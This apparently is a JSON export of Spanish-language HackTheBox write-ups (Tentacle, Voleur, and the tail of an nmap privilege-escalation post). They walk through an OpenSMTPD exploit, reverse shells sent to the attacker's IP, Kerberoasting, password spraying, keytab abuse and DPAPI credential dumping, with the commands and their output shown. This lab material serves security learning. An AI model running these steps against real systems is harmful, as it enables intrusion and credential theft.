outputs in Greppable format are disabled for security reasons.\" [\"-iL\"]=\"File input mode is disabled for security reasons.\" ) # Check if any restricted options are used for option in \"${!RESTRICTED_OPTIONS[@]}\"; do if [[ \"$*\" == *\"$option\"* ]]; then echo \"${RESTRICTED_OPTIONS[$option]}\" exit 1 fi done # Execute the original nmap binary with the provided arguments exec /usr/bin/nmap.original \"$@\" ``` [Motor de scripts de Nmap](https://nmap-org.translate.goog/book/nse-usage.html?_x_tr_sl=en&_x_tr_tl=es&_x_tr_hl=es&_x_tr_pto=tc) ```bash echo 'os.execute(\"/bin/bash\")' > test.sh ``` ```bash sudo nmap -sC --datadir=/tmp ``` ![Image](image-6.png)"},{"id":"tentacle","title":"HTB - Tentacle","description":"Tentacle","date":"2025-07-23T00:00:00.000Z","tags":["DNS","proxychains","CVE-2020-7247","gssap","proxy","kerberos","crontab"],"authors":["r4cc0x"],"url":"/blog/tentacle","content":"```bash ping -c 3 10.10.10.224 PING 10.10.10.224 (10.10.10.224) 56(84) bytes of data. 64 bytes from 10.10.10.224: icmp_seq=1 ttl=63 time=130 ms 64 bytes from 10.10.10.224: icmp_seq=2 ttl=63 time=130 ms 64 bytes from 10.10.10.224: icmp_seq=3 ttl=63 time=131 ms ``` ## Recon ```bash sudo nmap -p- --open --min-rate 5000 -n -vv -Pn 10.10.10.224 -oG allPorts nmap -sCV -p 22,53,88,3128 10.10.10.224 -oN targeted ``` ```bash Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-22 16:52 EDT Nmap scan report for 10.10.10.224 Host is up (0.13s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.0 (protocol 2.0) | ssh-hostkey: | 3072 8d:dd:18:10:e5:7b:b0:da:a3:fa:14:37:a7:52:7a:9c (RSA) | 256 f6:a9:2e:57:f8:18:b6:f4:ee:03:41:27:1e:1f:93:99 (ECDSA) |_ 256 04:74:dd:68:79:f4:22:78:d8:ce:dd:8b:3e:8c:76:3b (ED25519) 53/tcp open domain ISC BIND 9.11.20 (RedHat Enterprise Linux 8) | dns-nsid: |_ bind.version: 9.11.20-RedHat-9.11.20-5.el8 88/tcp open kerberos-sec MIT Kerberos (server time: 2025-07-22 20:52:08Z) 3128/tcp open http-proxy Squid http proxy 4.11 |_http-title: ERROR: The requested URL could not be retrieved |_http-server-header: squid/4.11 Service Info: Host: REALCORP.HTB; OS: Linux; CPE: cpe:/o:redhat:enterprise_linux:8 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 23.75 seconds ``` ```bash echo \"10.10.10.224 realcorp.htb\" | sudo tee -a /etc/hosts ``` ![image](image.png) ## DNS Enum ```bash dnsenum --dnsserver 10.10.10.224 --threads 50 -f /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt realcorp.htb Brute forcing with /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt: ______________________________________________________________________________________ ns.realcorp.htb. 259200 IN A 10.197.243.77 proxy.realcorp.htb. 259200 IN CNAME ns.realcorp.htb. ns.realcorp.htb. 259200 IN A 10.197.243.77 wpad.realcorp.htb. 259200 IN A 10.197.243.31 ``` ```bash 10.10.10.224 realcorp.htb 10.197.243.77 proxy.realcorp.htb 10.197.243.31 wpad.realcorp.htb ``` ### Proxychains ```bash nvim /etc/proxychains4.conf http 10.10.10.224 3128 http 127.0.0.1 3128 http 10.197.243.77 3128 ``` ```bash #!/bin/bash hosts=(\"10.197.243.77 10.197.243.31\") for host in ${hosts[@]}; do echo -e \"\\n[+]Scanning ports in $host\\n\" for port in $(seq 1 10000); do timeout 1 proxychains4 bash -c \"echo '' > /dev/tcp/$host/$port\" 2>/dev/null && echo -e \"\\t[+] Port: $port - OPEN!\" & done wait done ``` ```bash [+]Scanning ports in 10.197.243.77 [+] Port: 53 - OPEN! [+] Port: 88 - OPEN! [+] Port: 464 - OPEN! [+] Port: 3128 - OPEN! [+]Scanning ports in 10.197.243.31 [+] Port: 22 - OPEN! [+] Port: 88 - OPEN! [+] Port: 80 - OPEN! [Interesting] [+] Port: 53 - OPEN! [+] Port: 749 - OPEN! [+] Port: 464 - OPEN! [+] Port: 3128 - OPEN! ``` ```bash proxychains -q curl -s http://wpad.realcorp.htb | batcat --style=plain 403 Forbidden 403 Forbidden nginx/1.14.1 ``` Si buscamos wpad pentesting obtendremos informacion dondre podemos obtener un archivo llamado wpad.dat [abusando-de-wpad-para-implantar-ficheros-pac](https://www.hackplayers.com/2016/05/abusando-de-wpad-para-implantar-ficheros-pac.html) ```bash proxychains -q curl -s http://wpad.realcorp.htb/wpad.dat | batcat --style=plain function FindProxyForURL(url, host) { if (dnsDomainIs(host, \"realcorp.htb\")) return \"DIRECT\"; if (isInNet(dnsResolve(host), \"10.197.243.0\", \"255.255.255.0\")) return \"DIRECT\"; if (isInNet(dnsResolve(host), \"10.241.251.0\", \"255.255.255.0\")) return \"DIRECT\"; return \"PROXY proxy.realcorp.htb:3128\"; } ``` ```bash proxychains -q wget http://wpad.realcorp.htb/wpad.dat ``` #### Segmento B `10.241.251.0` ```bash #!/bin/bash for port in 21 22 25 80 88 443 445 8080 8000 8081; do for i in $(seq 1 254); do proxychains -q timeout 1 bash -c \"echo '' > /dev/tcp/10.241.251.$i/$port\" 2>/dev/null && echo \"[+] Port $port - Open on host 10.241.251.$i\" & done wait done ``` ```bash ./scanning.sh [+] Port 22 - Open on host 10.241.251.1 [+] Port 25 - Open on host 10.241.251.113 [Service SMTPD] [+] Port 88 - Open on host 10.241.251.1 ``` La manera en la que podemos ver este segmento es a traves de proxychains que tenemos configurado nuestro archivo proxychains4.conf: ![image](image-1.png) Es decir que saltamos de ``10.10.10.224`` -> ``127.0.0.1`` -> ``10.197.243.77``. He tenido problemas con nmap para enumerar puertos con proxychains, asi que con un comando intentare obtener la version del puerto 25 de la 10.241.251.113. ```bash proxychains -q timeout 1 bash -c \"echo 'QUIT' | nc -w 1 10.241.251.113 25\" 2>/dev/null 220 smtp.realcorp.htb ESMTP OpenSMTPD 221 2.0.0 Bye ``` ## CVE-2020-7247 https://github.com/QTranspose/CVE-2020-7247-exploit.git ```bash ./kerbrute userenum -d realcorp.htb --dc 10.10.10.224 ~/Documents/HTB/Tentacle/content/user ``` ![image](image-2.png) `sudo apt update && sudo apt install python3-pwntools ` ```bash proxychains python3 exploit.py 10.241.251.113 25 10.10.14.18 4444 j.nakazawa@REALCORP.HTB [proxychains] config file found: /etc/proxychains4.conf [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4 [proxychains] DLL init: proxychains-ng 4.17 [▘] Opening connectio[▝][▖] 241.251.113 on port 25[▘] ying 10.241.251.113 [+] Opening connection to 10.241.251.113 on port 25: Done [+] Target port is running OpenSMTPD [+] Sending love letter to j.nakazawa@REALCORP.HTB: Done ``` ![image](image-3.png) ```bash ip a 1: lo: mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo valid_lft forever preferred_lft forever inet6 ::1/128 scope host valid_lft forever preferred_lft forever 3: eth0@if4: mtu 1500 qdisc noqueue state UP group default link/ether 0a:67:d7:0a:5e:9d brd ff:ff:ff:ff:ff:ff link-netnsid 0 inet 10.241.251.113/24 brd 10.241.251.255 scope global eth0 valid_lft forever preferred_lft forever inet6 fe80::867:d7ff:fe0a:5e9d/64 scope link valid_lft forever preferred_lft forever root@smtp:/# hostname hostname smtp.realcorp.htb ``` ```bash root@smtp:/home/j.nakazawa# cat .msmtprc cat .msmtprc # Set default values for all following accounts. defaults auth on tls on tls_trust_file /etc/ssl/certs/ca-certificates.crt logfile /dev/null # RealCorp Mail account realcorp host 127.0.0.1 port 587 from j.nakazawa@realcorp.htb user j.nakazawa password sJB}RM>6Z~64_ tls_fingerprint C9:6A:B9:F6:0A:D4:9C:2B:B9:F6:44:1F:30:B8:5E:5A:D8:0D:A5:60 # Set a default account account default : realcorp ``` SSH ![image](image-4.png) `gssap-with-mic` https://unix.stackexchange.com/questions/90383/ssh-authentication-using-gssapi-keyex-or-gssapi-with-mic-publickey-not-permitte ```bash [libdefaults] default_realm = REALCORP.HTB [realms] REALCORP.HTB = { kdc = srv01.realcorp.htb:88 [domain_realm] .realcorp.htb = REALCORP.HTB realcorp.htb = REALCORP.HTB ``` ```bash sudo ntpdate 10.10.10.224 ``` ```bash kinit j.nakazawa Password for j.nakazawa@REALCORP.HTB: ``` ```bash klist Ticket cache: FILE:/tmp/krb5cc_1000 Default principal: j.nakazawa@REALCORP.HTB Valid starting Expires Service principal 07/22/2025 23:30:23 07/23/2025 23:30:23 krbtgt/REALCORP.HTB@REALCORP.HTB renew until 07/22/2025 23:30:23 ``` ```bash ssh j.nakazawa@10.10.10.224 Activate the web console with: systemctl enable --now cockpit.socket Last failed login: Wed Jul 23 05:16:32 BST 2025 from 10.10.14.18 on ssh:notty There were 48 failed login attempts since the last successful login. Last login: Thu Dec 24 06:02:06 2020 from 10.10.14.2 [j.nakazawa@srv01 ~] ``` ```bash cat /etc/passwd | grep \"bash\" root:x:0:0:root:/root:/bin/bash j.nakazawa:x:1000:1000::/home/j.nakazawa:/bin/bash admin:x:1011:1011::/home/admin:/bin/bash ``` ```bash [j.nakazawa@srv01 ~]$ find / -perm -4000 2>/dev/null /usr/libexec/sssd/ldap_child /usr/libexec/sssd/proxy_child /usr/libexec/sssd/krb5_child /usr/libexec/sssd/selinux_child /usr/libexec/dbus-1/dbus-daemon-launch-helper /usr/libexec/cockpit-session /usr/lib/polkit-1/polkit-agent-helper-1 /usr/sbin/pam_timestamp_check /usr/sbin/unix_chkpwd /usr/sbin/grub2-set-bootflag /usr/sbin/userhelper /usr/bin/chage /usr/bin/gpasswd /usr/bin/newgrp /usr/bin/mount /usr/bin/su /usr/bin/umount /usr/bin/chfn /usr/bin/pkexec /usr/bin/crontab /usr/bin/sudo /usr/bin/passwd /usr/bin/chsh /usr/bin/at /usr/bin/fusermount /usr/bin/ksu ``` ```bash cat /etc/os-release NAME=\"CentOS Linux\" VERSION=\"8\" ID=\"centos\" ID_LIKE=\"rhel fedora\" VERSION_ID=\"8\" PLATFORM_ID=\"platform:el8\" PRETTY_NAME=\"CentOS Linux 8\" ANSI_COLOR=\"0;31\" CPE_NAME=\"cpe:/o:centos:centos:8\" HOME_URL=\"https://centos.org/\" BUG_REPORT_URL=\"https://bugs.centos.org/\" CENTOS_MANTISBT_PROJECT=\"CentOS-8\" CENTOS_MANTISBT_PROJECT_VERSION=\"8\" ``` ```bash cat /etc/crontab SHELL=/bin/bash PATH=/sbin:/bin:/usr/sbin:/usr/bin MAILTO=root # For details see man 4 crontabs # Example of job definition: # .---------------- minute (0 - 59) # | .------------- hour (0 - 23) # | | .---------- day of month (1 - 31) # | | | .------- month (1 - 12) OR jan,feb,mar,apr ... # | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat # | | | | | # * * * * * user-name command to be executed * * * * * admin /usr/local/bin/log_backup.sh ``` ```bash #!/bin/bash /usr/bin/rsync -avz --no-perms --no-owner --no-group /var/log/squid/ /home/admin/ cd /home/admin /usr/bin/tar czf squid_logs.tar.gz.`/usr/bin/date +%F-%H%M%S` access.log cache.log /usr/bin/rm -f access.log cache.log ``` ```bash id uid=1000(j.nakazawa) gid=1000(j.nakazawa) groups=1000(j.nakazawa),23(squid),100(users) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 ``` `cd /var/log/squid/` https://web.mit.edu/kerberos/krb5-devel/doc/user/user_config/k5login.html ```bash echo 'j.nakazawa@REALCORP.HTB' > .k5login ``` ## Admin ```bash find / -type f -group admin 2>/dev/null | grep -v -E \"proc|cgroup\" /home/admin/squid_logs.tar.gz.2025-07-23-063401 /usr/local/bin/log_backup.sh /etc/krb5.keytab ``` **krb5.keytab** es un componente crítico en sistemas que usan Kerberos para autenticación. Funciona como un almacén seguro de credenciales para servicios o hosts, permitiéndoles autenticarse sin requerir contraseñas manuales. https://web.mit.edu/kerberos/krb5-devel/doc/basic/keytab_def.html ```bash k [TAB][TAB] ``` ![image](image-5.png) ```bash bash-4.4$ klist -h [SNIP...] -k specifies keytab [snip...] ``` ```bash klist -k /etc/krb5.keytab Keytab name: FILE:/etc/krb5.keytab KVNO Principal ---- -------------------------------------------------------------------------- 2 host/srv01.realcorp.htb@REALCORP.HTB 2 host/srv01.realcorp.htb@REALCORP.HTB 2 host/srv01.realcorp.htb@REALCORP.HTB 2 host/srv01.realcorp.htb@REALCORP.HTB 2 host/srv01.realcorp.htb@REALCORP.HTB 2 kadmin/changepw@REALCORP.HTB 2 kadmin/changepw@REALCORP.HTB 2 kadmin/changepw@REALCORP.HTB 2 kadmin/changepw@REALCORP.HTB 2 kadmin/changepw@REALCORP.HTB 2 kadmin/admin@REALCORP.HTB 2 kadmin/admin@REALCORP.HTB 2 kadmin/admin@REALCORP.HTB 2 kadmin/admin@REALCORP.HTB 2 kadmin/admin@REALCORP.HTB ``` Kadmin es una herramienta administrativa de kerberos para gestionar usuarios, politicas y pincipals. Iniciamos una sesion administrativa en kerberos autenticandonos automaticamente usando keytab (archivos de claves) en lugar de pedir contraseña. ```bash kadmin -kt /etc/krb5.keytab -p kadmin/admin@REALCORP.HTB ``` ![image](image-6.png) Agregamos un nuevo principals (usuario/servicio) en kerberos con el nombre root. ```bash addprinc root@REALCORP.HTB ola ola exit ``` Y con ksu cambiamos al usuario que creamos, en este caso a root. ```bash ksu ``` ![image](image-7.png)"},{"id":"voleur","title":"HTB - Voleur","description":"HTB - Voleur.","date":"2025-07-20T00:00:00.000Z","tags":["HackTheBox","Medium","AD","nxc","DACL","Kerberos","DPAPI","bloodhound","john"],"authors":[],"url":"/blog/voleur","content":"## Box Info | Name | Outbound | | :-------------------- | ---------------: | | Release Date | 05 Jul, 2025 | | OS | Windows | | Rated Difficulty | Medium | ```zsh ping -c 3 10.10.11.76 PING 10.10.11.76 (10.10.11.76) 56(84) bytes of data. 64 bytes from 10.10.11.76: icmp_seq=1 ttl=127 time=131 ms 64 bytes from 10.10.11.76: icmp_seq=2 ttl=127 time=131 ms 64 bytes from 10.10.11.76: icmp_seq=3 ttl=127 time=130 ms ``` Machine Information As is common in real life Windows pentests, you will start the Voleur box with credentials for the following account: ```powershell ryan.naylor / HollowOct31Nyt ``` ```zsh sudo nmap -p- --open --min-rate 5000 -n -vv -Pn 10.10.11.76 -oG allPorts nmap -sCV -p 53,88,135,139,389,445,464,593,636,2222,3268,3269,5985,9389,49664,49668,52377,63316,63317,63318,63344 10.10.11.76 -oN targeted ``` ```zsh # Nmap 7.95 scan initiated Sun Jul 20 13:36:06 2025 as: /usr/lib/nmap/nmap --privileged -sCV -p 53,88,135,139,389,445,464,593,636,2222,3268,3269,5985,9389,49664,49668,52377,63316,63317,63318,63344 -oN targeted 10.10.11.76 Nmap scan report for 10.10.11.76 Host is up (0.13s latency). PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-07-21 01:36:14Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: voleur.htb0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 2222/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 42:40:39:30:d6:fc:44:95:37:e1:9b:88:0b:a2:d7:71 (RSA) | 256 ae:d9:c2:b8:7d:65:6f:58:c8:f4:ae:4f:e4:e8:cd:94 (ECDSA) |_ 256 53:ad:6b:6c:ca:ae:1b:40:44:71:52:95:29:b1:bb:c1 (ED25519) 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: voleur.htb0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 9389/tcp open mc-nmf .NET Message Framing 49664/tcp open msrpc Microsoft Windows RPC 49668/tcp open msrpc Microsoft Windows RPC 52377/tcp open msrpc Microsoft Windows RPC 63316/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 63317/tcp open msrpc Microsoft Windows RPC 63318/tcp open msrpc Microsoft Windows RPC 63344/tcp open msrpc Microsoft Windows RPC Service Info: Host: DC; OSs: Windows, Linux; CPE: cpe:/o:microsoft:windows, cpe:/o:linux:linux_kernel Host script results: | smb2-time: | date: 2025-07-21T01:37:07 |_ start_date: N/A |_clock-skew: 7h59m59s | smb2-security-mode: | 3:1:1: |_ Message signing enabled and required ``` ```zsh echo \"10.10.11.76 voleur.htb\" | sudo tee -a /etc/hosts ``` ```zsh nxc smb 10.10.11.76 SMB 10.10.11.76 445 10.10.11.76 [*] x64 (name:10.10.11.76) (domain:10.10.11.76) (signing:True) (SMBv1:False) (NTLM:False) ``` Validamos las credenciales que tenemos. ```zsh nxc smb 10.10.11.76 -u 'ryan.naylor' -p 'HollowOct31Nyt' --shares SMB 10.10.11.76 445 10.10.11.76 [*] x64 (name:10.10.11.76) (domain:10.10.11.76) (signing:True) (SMBv1:False) (NTLM:False) SMB 10.10.11.76 445 10.10.11.76 [-] 10.10.11.76\\ryan.naylor:HollowOct31Nyt STATUS_NOT_SUPPORTED ``` #### Krb5.conf Modificaremos el archivo krb5.conf que se encuentra en la ruta ``/etc/krb5.conf`` si no la tienes creala. ```bash [libdefaults] default_realm = VOLEUR.HTB dns_lookup_realm = false dns_lookup_kdc = false ticket_lifetime = 24h renew_lifetime = 7d forwardable = true [realms] VOLEUR.HTB = { kdc = 10.10.11.76 admin_server = 10.10.11.76 default_domain = voleur.htb } [domain_realm] .voleur.htb = VOLEUR.HTB voleur.htb = VOLEUR.HTB ``` Aun asi nos da problemas al intentar enumerar usuarios con smb. ```bash SMB voleur.htb 445 voleur [-] htb\\ryan.naylor:HollowOct31Nyt [Errno Connection error (HTB:88)] [Errno -2] Name or service not known ``` - KRB5CCNAME Es otra forma ```zsh impacket-getTGT 'voleur.htb/ryan.naylor:HollowOct31Nyt' -dc-ip 10.10.11.76 Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great) ``` https://medium.com/@danieldantebarnes/fixing-the-kerberos-sessionerror-krb-ap-err-skew-clock-skew-too-great-issue-while-kerberoasting-b60b0fe20069 Como root ejecutaremos el siguiente comando para poder sincronizar el reloj al dominio. ``` timedatectl set-ntp off ``` ``` rdate -n voleur.htb ``` Ahora si ejecutamos el comando para obtener un ccache y exportarlo como KRB5CCNAME ```zsh impacket-getTGT 'voleur.htb/ryan.naylor:HollowOct31Nyt' -dc-ip 10.10.11.76 Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies [*] Saving ticket in ryan.naylor.ccache ``` ```zsh export KRB5CCNAME=ryan.naylor.ccache ``` Ahora podemos validar con smb y ldap ```zsh nxc ldap dc.voleur.htb -u 'ryan.naylor' -p 'HollowOct31Nyt' -k LDAP dc.voleur.htb 389 DC [*] None (name:DC) (domain:voleur.htb) LDAP dc.voleur.htb 389 DC [+] voleur.htb\\ryan.naylor:HollowOct31Nyt ``` ```zsh nxc smb dc.voleur.htb -u 'ryan.naylor' -p 'HollowOct31Nyt' -k SMB dc.voleur.htb 445 dc [*] x64 (name:dc) (domain:voleur.htb) (signing:True) (SMBv1:False) (NTLM:False) SMB dc.voleur.htb 445 dc [+] voleur.htb\\ryan.naylor:HollowOct31Nyt ``` ## Users Enumeration Ahora que hemos validado, podemos enumerar usuarios. ```zsh nxc smb dc.voleur.htb -u 'ryan.naylor' -p 'HollowOct31Nyt' -k --rid-brute | grep SidTypeUser ``` Guardamos en un archivo users. ```zsh cat users| awk '{print $6, $NF}' | cut -d '\\' -f2 | cut -d '(' -f1 ``` ``` Administrator Guest krbtgt DC$ ryan.naylor marie.bryant lacey.miller svc_ldap svc_backup svc_iis jeremy.combs svc_winrm ``` ## Password Spraying ```zsh nxc smb dc.voleur.htb -u users -p 'HollowOct31Nyt' -k --continue-on-success ``` Pero no hubo algun usuario con la misma contraseña. ## BloodHound ```zsh bloodhound-python -d voleur.htb -u ryan.naylor -p 'HollowOct31Nyt' -k -ns 10.10.11.76 -c All --zip -c All ``` Usamos bloodhound para ver si teniamos algun atributo como ryan.naylor hacia algun objeto del domain controller pero no encontramos nada. ```zsh nxc smb dc.voleur.htb -u ryan.naylor -p 'HollowOct31Nyt' -k --shares SMB dc.voleur.htb 445 dc [*] x64 (name:dc) (domain:voleur.htb) (signing:True) (SMBv1:False) (NTLM:False) SMB dc.voleur.htb 445 dc [+] voleur.htb\\ryan.naylor:HollowOct31Nyt SMB dc.voleur.htb 445 dc [*] Enumerated shares SMB dc.voleur.htb 445 dc Share Permissions Remark SMB dc.voleur.htb 445 dc ----- ----------- ------ SMB dc.voleur.htb 445 dc ADMIN$ Remote Admin SMB dc.voleur.htb 445 dc C$ Default share SMB dc.voleur.htb 445 dc Finance SMB dc.voleur.htb 445 dc HR SMB dc.voleur.htb 445 dc IPC$ READ Remote IPC SMB dc.voleur.htb 445 dc IT READ SMB dc.voleur.htb 445 dc NETLOGON READ Logon server share SMB dc.voleur.htb 445 dc SYSVOL READ Logon server share ``` https://www-netexec-wiki.translate.goog/smb-protocol/spidering-shares?_x_tr_sl=en&_x_tr_tl=es&_x_tr_hl=es&_x_tr_pto=tc&_x_tr_hist=true#using-module-spider_plus ```zsh nxc smb dc.voleur.htb -u ryan.naylor -p 'HollowOct31Nyt' -k -M spider_plus ``` ```js { \"IT\": { \"First-Line Support/Access_Review.xlsx\": { \"atime_epoch\": \"2025-01-31 04:09:27\", \"ctime_epoch\": \"2025-01-29 04:39:51\", \"mtime_epoch\": \"2025-05-29 18:23:36\", \"size\": \"16.5 KB\" } }, ``` ```zsh nxc smb dc.voleur.htb -u ryan.naylor -p 'HollowOct31Nyt' -k -M spider_plus -o DOWNLOAD_FLAG=True ``` ![Image](image.png) #### Crack Hash with Office2John ```zsh office2john Access_Review.xlsx > hash ``` ```zsh john hash -w=/usr/share/wordlists/rockyou.txt Using default input encoding: UTF-8 Loaded 1 password hash (Office, 2007/2010/2013 [SHA1 128/128 AVX 4x / SHA512 128/128 AVX 2x AES]) Cost 1 (MS Office version) is 2013 for all loaded hashes Cost 2 (iteration count) is 100000 for all loaded hashes Will run 6 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status football1 (Access_Review.xlsx) 1g 0:00:00:02 DONE (2025-07-21 00:35) 0.3344g/s 264.8p/s 264.8c/s 264.8C/s football1..capricorn Use the \"--show\" option to display all of the cracked passwords reliably Session completed. ``` ``` football1 ``` ![Image](image-1.png) Tenemos 3 contraseñas de las cuales intentaremos realizar un password spraying attack. ```zsh nxc smb dc.voleur.htb -u users -p passw -k --continue-on-success ``` ```zsh voleur.htb\\svc_iis:N5pXyW1VqM7CZ8 voleur.htb\\svc_ldap:M1XyC9pW7qT5Vn ``` Como ninguno de estos 2 usuarios es parte del grupo remote management, con bloodhound podremos enumerar si alguno tiene algun atributo hacia un objeto del DC. ![Image](image-2.png) Para el caso del usuario ``svc_ldap`` tenemos que tiene el atributo WriteSPN hacia el objeto `svc_winrm` y algo a destacar es que este usuario es parte del grupo `RESTORE_USERS` muy importante ya que en el archivo excel mencionan que el usuario `todd.wolfe` fue borrado. ```zsh python3 targetedKerberoast.py -k --dc-host dc.voleur.htb -u svc_ldap -p 'M1XyC9pW7qT5Vn' -d voleur.htb ``` ![Image](image-3.png) ```zsh john hash3 -w=/usr/share/wordlists/rockyou.txt Using default input encoding: UTF-8 Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4]) Will run 6 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status AFireInsidedeOzarctica980219afi (?) 1g 0:00:00:03 DONE (2025-07-21 01:12) 0.2680g/s 3075Kp/s 3075Kc/s 3075KC/s AHANACK6978012..AEGIES Use the \"--show\" option to display all of the cracked passwords reliably Session completed. ``` ```zsh svc_winrm : AFireInsidedeOzarctica980219afi ``` Para autenticarse tendremos que generar de nuevo un archivo KRB5 para iniciar sesion en winrm. ```zsh impacket-getTGT 'voleur.htb/svc_winrm:AFireInsidedeOzarctica980219afi' -dc-ip 10.10.11.76 ``` ```zsh KRB5CCNAME=svc_winrm.ccache evil-winrm -i dc.voleur.htb -r voleur.htb ``` ![Image](image-4.png) En este punto el usuario svc_winrm no es de mucha utilidad y como anteriormente mencionamos el usuario ``svc_ldap`` esta en el grupo de `RESTORE_USERS` que nos podria ser de utilidad para restaurar la cuenta del usuario ``todd_wolfe``, pero como svc_ldap no es parte de remote_management tendremos que a partir de svc_winrm enviarnos una powershell median RunasCs ```zsh .\\RunasCs.exe svc_ldap M1XyC9pW7qT5Vn powershell.exe -r 10.10.14.18:4444 ``` ![Image](image-5.png) Con este comando nos filtra y lista aquellos objetos (usuarios) que fueron borrados. ```zsh Get-ADObject -Filter {isDeleted -eq $true -and objectClass -eq \"user\"} -IncludeDeletedObjects ``` ```zsh Deleted : True DistinguishedName : CN=Todd Wolfe\\0ADEL:1c6b1deb-c372-4cbb-87b1-15031de169db,CN=Deleted Objects,DC=voleur,DC=htb Name : Todd Wolfe DEL:1c6b1deb-c372-4cbb-87b1-15031de169db ObjectClass : user ObjectGUID : 1c6b1deb-c372-4cbb-87b1-15031de169db ``` Para restaurarlo simplemente le pasamos el ObjectGUID ```zsh Restore-ADObject -Identity \"1c6b1deb-c372-4cbb-87b1-15031de169db\" ``` Para verificar si se restauro: ```powershell net user /domain ``` ![Image](image-6.png) Recordemos que tenemos la contraseña de `todd.wolfe` que la encontramos en el excel. ```zsh bloodhound-python -d voleur.htb -u todd.wolfe -p 'NightT1meP1dg3on14' -k -ns 10.10.11.76 -c All --zip -c All ``` ![Image](image-7.png) ```ZSH impacket-getTGT 'voleur.htb/todd.wolfe:NightT1meP1dg3on14' -dc-ip 10.10.11.76 ``` ``` export KRB5CCNAME=todd.wolfe.ccache ``` ```zsh impacket-smbclient -k dc.voleur.htb ``` ![Image](image-8.png) Con el impacket-smbclient podemos enumerar de manre mas facil los recursos compartidos. En el recurso compartido de `IT` hay un directorio de la segunda linea de soporte que es donde se encuentra el usuario todd.wolfe. ![Image](image-9.png) Vemos toda la raiz compartida del usuario todd.wolfe. ![Image](image-10.png) ## DPAPI Descifrar la clave maestra para obtener la clave offline. La API de protección de datos (DPAPI) es un componente interno del sistema Windows. Permite que diversas aplicaciones almacenen datos confidenciales (p. ej., contraseñas). Los datos se almacenan en el directorio de usuarios y están protegidos por claves maestras específicas del usuario, derivadas de su contraseña. Suelen estar ubicados en: ```powershell C:\\Users\\$USER\\AppData\\Roaming\\Microsoft\\Protect\\$SUID\\$GUID ``` Aplicaciones como Google Chrome, Outlook, Internet Explorer y Skype utilizan la API DPAPI. Windows también utiliza esta API para información confidencial, como contraseñas de Wi-Fi, certificados, contraseñas de conexión RDP y mucho más. A continuación, se muestran las rutas comunes de archivos ocultos que suelen contener datos protegidos por la API DPAPI. ``` C:\\Users\\$USER\\AppData\\Local\\Microsoft\\Credentials\\ C:\\Users\\$USER\\AppData\\Roaming\\Microsoft\\Credentials\\ ``` Nos traemos los archivos ```zsh get /Second-Line Support/Archived Users/todd.wolfe/AppData/Roaming/Microsoft/Protect/S-1-5-21-3927696377-1337352550-2781715495-1110/08949382-134f-4c63-b93c-ce52efc0aa88 get /Second-Line Support/Archived Users/todd.wolfe/AppData/Roaming/Microsoft/Credentials/772275FAD58525253490A9B0039791D3 ``` - MasterKeyFile ```zsh impacket-dpapi masterkey -file 08949382-134f-4c63-b93c-ce52efc0aa88 -sid S-1-5-21-3927696377-1337352550-2781715495-1110 -password NightT1meP1dg3on14 ``` ```zsh [MASTERKEYFILE] Version : 2 (2) Guid : 08949382-134f-4c63-b93c-ce52efc0aa88 Flags : 0 (0) Policy : 0 (0) MasterKeyLen: 00000088 (136) BackupKeyLen: 00000068 (104) CredHistLen : 00000000 (0) DomainKeyLen: 00000174 (372) Decrypted key with User Key (MD4 protected) Decrypted key: 0xd2832547d1d5e0a01ef271ede2d299248d1cb0320061fd5355fea2907f9cf879d10c9f329c77c4fd0b9bf83a9e240ce2b8a9dfb92a0d15969ccae6f550650a83 ``` - Credential ```zsh impacket-dpapi credential -file 772275FAD58525253490A9B0039791D3 -key 0xd2832547d1d5e0a01ef271ede2d299248d1cb0320061fd5355fea2907f9cf879d10c9f329c77c4fd0b9bf83a9e240ce2b8a9dfb92a0d15969ccae6f550650a83 ``` ```zsh Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies [CREDENTIAL] LastWritten : 2025-01-29 12:55:19+00:00 Flags : 0x00000030 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH) Persist : 0x00000003 (CRED_PERSIST_ENTERPRISE) Type : 0x00000002 (CRED_TYPE_DOMAIN_PASSWORD) Target : Domain:target=Jezzas_Account Description : Unknown : Username : jeremy.combs Unknown : qT3V9pLXyN7W4m ``` Vemos que jeremy.combs ahora esta en el grupo de `THIRD-LINE TECHNICIANS` ![Image](image-11.png) ```ZSH impacket-getTGT 'voleur.htb/jeremy.combs:qT3V9pLXyN7W4m' -dc-ip 10.10.11.76 ``` ``` export KRB5CCNAME=jeremy.combs.ccache ``` ```zsh impacket-smbclient -k 